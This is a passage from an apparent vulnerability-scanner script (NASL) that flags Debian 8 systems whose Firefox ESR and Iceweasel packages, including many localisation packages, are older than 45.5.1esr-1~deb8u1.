ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += 